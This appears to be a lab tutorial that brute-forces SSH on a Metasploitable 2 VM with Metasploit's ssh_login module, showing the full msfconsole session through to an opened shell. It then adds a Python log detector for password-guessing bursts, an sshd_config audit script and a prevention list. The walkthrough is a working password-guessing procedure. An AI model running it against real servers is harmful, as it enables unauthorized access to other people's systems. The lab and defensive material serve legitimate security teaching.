Metasploitable 2 server: Brute-forcing the SSH login session using Metasploit Console (msfconsole)

In my previous lab, I demonstrated to you how a brute-force attack works on a server.

Goal: brute-force the Metasploitable server and gain an SSH session.

Follow the steps below to get a login session:


Step 1: Start the msfconsole

Use the commands below to initialise the Metasploit database and then start the console:

┌─[✗]─[mrdev@mr-dev]─[~]
└──╼ $sudo msfdb init
[+] Starting database
[i] The database appears to be already configured, skipping initialization
┌─[mrdev@mr-dev]─[~]
└──╼ $sudo msfconsole
                                                  

 ______________________________________________________________________________
|                                                                              |
|                   METASPLOIT CYBER MISSILE COMMAND V5                        |
|______________________________________________________________________________|
      \                                  /                      /
       \     .                          /                      /            x
        \                              /                      /
         \                            /          +           /
          \            +             /                      /
           *                        /                      /
                                   /      .               /
    X                             /                      /            X
                                 /                     ###
                                /                     # % #
                               /                       ###
                      .       /
     .                       /      .            *           .
                            /
                           *
                  +                       *

                                       ^
####      __     __     __          #######         __     __     __        ####
####    /    \ /    \ /    \      ###########     /    \ /    \ /    \      ####
################################################################################
################################################################################
# WAVE 5 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
################################################################################
                                                           https://metasploit.com


       =[ metasploit v6.1.9-dev                           ]
+ -- --=[ 2169 exploits - 1149 auxiliary - 398 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Search can apply complex filters such as 
search cve:2009 type:exploit, see all the filters 
with help search

msf6 >

Step 2: Search for the auxiliary module

Next, we load up the scanner module in Metasploit:

msf6 > search ssh_login

Matching Modules
================

   #  Name                                    Disclosure Date  Rank    Check  Description
   -  ----                                    ---------------  ----    -----  -----------
   0  auxiliary/scanner/ssh/ssh_login                          normal  No     SSH Login Check Scanner
   1  auxiliary/scanner/ssh/ssh_login_pubkey                   normal  No     SSH Public Key Login Scanner


Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/ssh/ssh_login_pubkey

msf6 > use 0
msf6 auxiliary(scanner/ssh/ssh_login) >


Step 3: Configure the ssh_login auxiliary module

Once the auxiliary module is selected, set the following options:

Note: You need a wordlist file to run the brute-force attack. Here, I use my wordlist from the previous chapter.

msf6 auxiliary(scanner/ssh/ssh_login) > show options 

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current database (Accepted: none,
                                                 user, user&realm)
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wi
                                                ki/Using-Metasploit
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           false            yes       Whether to print output for all attempts

msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.56.3
RHOSTS => 192.168.56.3
msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE wordlist.lst
PASS_FILE => wordlist.lst
msf6 auxiliary(scanner/ssh/ssh_login) > set USER_FILE wordlist.lst
USER_FILE => wordlist.lst
msf6 auxiliary(scanner/ssh/ssh_login) > set STOP_ON_SUCCESS true
msf6 auxiliary(scanner/ssh/ssh_login) >

Step 4: Run the module

Once the options are configured, execute the run command:

msf6 auxiliary(scanner/ssh/ssh_login) > run

[*] 192.168.56.3:22 - Starting bruteforce
[+] 192.168.56.3:22 - Success: 'user:user' 'uid=1001(user) gid=1001(user) groups=1001(user) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 1 opened (192.168.56.1:45003 -> 192.168.56.3:22) at 2022-01-15 02:24:31 +0530
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) >

Step 5: Interact with the shell

The output of step 4 shows that the auxiliary module completed and a command shell session was opened. List the session with the sessions command, then interact with it:

msf6 auxiliary(scanner/ssh/ssh_login) > sessions 

Active sessions
===============

  Id  Name  Type         Information                      Connection
  --  ----  ----         -----------                      ----------
  1         shell linux  SSH user:user (192.168.56.3:22)  192.168.56.1:45003 -> 192.168.56.3:22 (192.168.56.3)

msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i 1
[*] Starting interaction with 1...

SSH user:user (192.168.56.3:22)
id
uid=1001(user) gid=1001(user) groups=1001(user)
ls
cd ..
ls
ftp
msfadmin
service
user
^Z
Background session 1? [y/N]  y
msf6 auxiliary(scanner/ssh/ssh_login) > exit -y
┌─[mrdev@mr-dev]─[~]
└──╼ $
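The run in step 4 leaves a very recognisable trace on the target: a burst of "Failed password" lines from one source in /var/log/auth.log, followed by an "Accepted password" line from that same source. The script below is an added example (not part of the original post or of Metasploit) that parses OpenSSH log lines and raises an alert when a source passes a failure threshold inside a sliding window, and a second alert when such a source then logs in successfully. The log lines, hostname, PIDs, ports and the year used for the timestamps are all constructed for the example.

```python
"""Spot SSH password-guessing bursts in OpenSSH auth log lines."""
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample of what a run like the one above would leave in the
# target's /var/log/auth.log: eight failures from one source within 30 seconds,
# then a successful password login from that same source, plus unrelated
# traffic from another host. Hostname, PIDs and ports are made up.
SAMPLE_AUTH_LOG = """\
Jan 15 02:24:10 metasploitable sshd[4321]: Failed password for invalid user admin from 192.168.56.1 port 45001 ssh2
Jan 15 02:24:12 metasploitable sshd[4322]: Failed password for root from 192.168.56.1 port 45002 ssh2
Jan 15 02:24:14 metasploitable sshd[4323]: Failed password for invalid user ftp from 192.168.56.1 port 45003 ssh2
Jan 15 02:24:16 metasploitable sshd[4324]: Failed password for msfadmin from 192.168.56.1 port 45004 ssh2
Jan 15 02:24:18 metasploitable sshd[4325]: Failed password for invalid user test from 192.168.56.1 port 45005 ssh2
Jan 15 02:24:20 metasploitable sshd[4326]: Failed password for user from 192.168.56.1 port 45006 ssh2
Jan 15 02:24:22 metasploitable sshd[4327]: Failed password for invalid user guest from 192.168.56.1 port 45007 ssh2
Jan 15 02:24:24 metasploitable sshd[4328]: Failed password for service from 192.168.56.1 port 45008 ssh2
Jan 15 02:24:31 metasploitable sshd[4329]: Accepted password for user from 192.168.56.1 port 45009 ssh2
Jan 15 02:30:05 metasploitable sshd[4350]: Failed password for msfadmin from 192.168.56.20 port 51000 ssh2
Jan 15 02:30:12 metasploitable sshd[4351]: Accepted publickey for msfadmin from 192.168.56.20 port 51001 ssh2
"""

# Matches the two OpenSSH line shapes we care about; the "invalid user" marker
# appears when the username does not exist on the host.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+ ssh2"
)


def parse_ts(text, year=2022):
    # Syslog timestamps carry no year; the year is an assumed constant here.
    return datetime.strptime(text, "%b %d %H:%M:%S").replace(year=year)


def detect(log_text, threshold=5, window_seconds=60):
    """Return alerts: a 'bruteforce' alert the first time a source reaches
    `threshold` failures inside the sliding window, and a 'success_after_burst'
    alert when a source that is still over the threshold then logs in."""
    recent_failures = defaultdict(deque)  # source IP -> failure times in window
    already_flagged = set()
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not an authentication result line
        ts, ip = parse_ts(m["ts"]), m["ip"]
        window = recent_failures[ip]
        while window and (ts - window[0]).total_seconds() > window_seconds:
            window.popleft()  # drop failures older than the window
        if m["result"] == "Failed":
            window.append(ts)
            if len(window) >= threshold and ip not in already_flagged:
                already_flagged.add(ip)
                alerts.append({"kind": "bruteforce", "ip": ip,
                               "failures": len(window), "at": m["ts"]})
        elif len(window) >= threshold:
            # A success right after a burst is the signature of a guessed
            # credential, exactly what STOP_ON_SUCCESS produced above.
            alerts.append({"kind": "success_after_burst", "ip": ip,
                           "user": m["user"], "method": m["method"], "at": m["ts"]})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_AUTH_LOG):
        print(alert)
```

On the sample the first alert fires at the fifth failure from 192.168.56.1 and the second when that source logs in as "user" with a password; the single failure from 192.168.56.20 followed by a key-based login stays below the threshold and is not reported. The same sliding-window logic is what tools such as fail2ban apply before blocking a source, so the threshold and window are the two numbers worth tuning against your own normal traffic.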

Prevention:

There are many methods to stop or prevent brute-force attacks.

The most obvious is a strong password policy. Each web application or public server should enforce the use of strong passwords. For example, standard user accounts should have at least eight characters, including a number, uppercase and lowercase letters, and a special character. Moreover, servers should require frequent password changes.

Let’s look at other ways to prevent a brute-force attack.

  • Limit failed login attempts
  • Make the root user inaccessible via SSH by editing the sshd_config file
  • Don’t use the default port; edit the Port line in your sshd_config file
  • Use Captcha
  • Limit logins to a specified IP address or range
  • Two-factor authentication
  • Unique login URLs
  • Monitor server logs
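Several of the items above (failed-attempt limits, no root login over SSH, a non-default port, restricting logins to an address range) are sshd_config settings. The script below is an added example (not from the original post) that parses an sshd_config and reports the settings that make password guessing easy, showing a permissive configuration beside a hardened one. It reproduces two sshd parsing rules, keywords are case-insensitive and the first value seen for a keyword wins, and treats anything under a Match block as out of scope. The defaults used for absent keywords are the ones documented for current OpenSSH and are assumed here; older builds may differ. Both configuration texts are constructed.

```python
"""Audit an sshd_config for settings that make password guessing easy."""

# Constructed: permissive settings of the kind an untouched lab install has.
WEAK_SSHD_CONFIG = """\
Port 22
PermitRootLogin yes
PasswordAuthentication yes
PermitEmptyPasswords yes
MaxAuthTries 6
"""

# Constructed: the same keywords after applying the prevention list above.
# AllowUsers with a user@CIDR pattern limits who may log in and from where.
HARDENED_SSHD_CONFIG = """\
Port 2222
PermitRootLogin no
PasswordAuthentication no
PermitEmptyPasswords no
MaxAuthTries 3
LoginGraceTime 30
AllowUsers msfadmin@192.168.56.0/24
"""


def parse_sshd_config(text):
    """Return {keyword: value} using sshd's own rules: keywords are
    case-insensitive, the first value wins, and a Match block ends the
    global section (its settings are conditional, so they are not audited)."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # strip comments and blanks
        if not line:
            continue
        parts = line.split(None, 1)
        keyword = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if keyword == "match":
            break
        settings.setdefault(keyword, value)  # first occurrence wins
    return settings


# (keyword, default when absent, predicate for an acceptable value, advice)
# Defaults assumed from current OpenSSH documentation.
CHECKS = [
    ("permitrootlogin", "prohibit-password",
     lambda v: v in ("no", "prohibit-password"), "set PermitRootLogin no"),
    ("passwordauthentication", "yes",
     lambda v: v == "no", "set PasswordAuthentication no and use keys"),
    ("permitemptypasswords", "no",
     lambda v: v == "no", "set PermitEmptyPasswords no"),
    ("maxauthtries", "6",
     lambda v: v.isdigit() and int(v) <= 3, "set MaxAuthTries 3 or lower"),
    ("port", "22",
     lambda v: v != "22", "move the listener off port 22"),
    ("allowusers", None,
     lambda v: bool(v), "restrict logins with AllowUsers user@network/cidr"),
]


def audit(text):
    """Return one finding per failed check, in CHECKS order."""
    settings = parse_sshd_config(text)
    findings = []
    for keyword, default, acceptable, advice in CHECKS:
        value = settings.get(keyword, default)
        if value is None or not acceptable(value):
            findings.append({"keyword": keyword, "value": value, "advice": advice})
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_SSHD_CONFIG), ("hardened", HARDENED_SSHD_CONFIG)):
        print(f"{label}: {len(audit(cfg))} finding(s)")
        for f in audit(cfg):
            print(f"  {f['keyword']} = {f['value']!r}: {f['advice']}")
```

The weak configuration produces six findings and the hardened one none. Two caveats a practitioner should keep in mind: moving the port only reduces noise, since a port scan still finds the listener, so it is no substitute for the other settings; and because the first value wins, a hardening line appended at the bottom of a file that already sets the same keyword higher up has no effect, which is exactly the kind of mistake this check catches.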
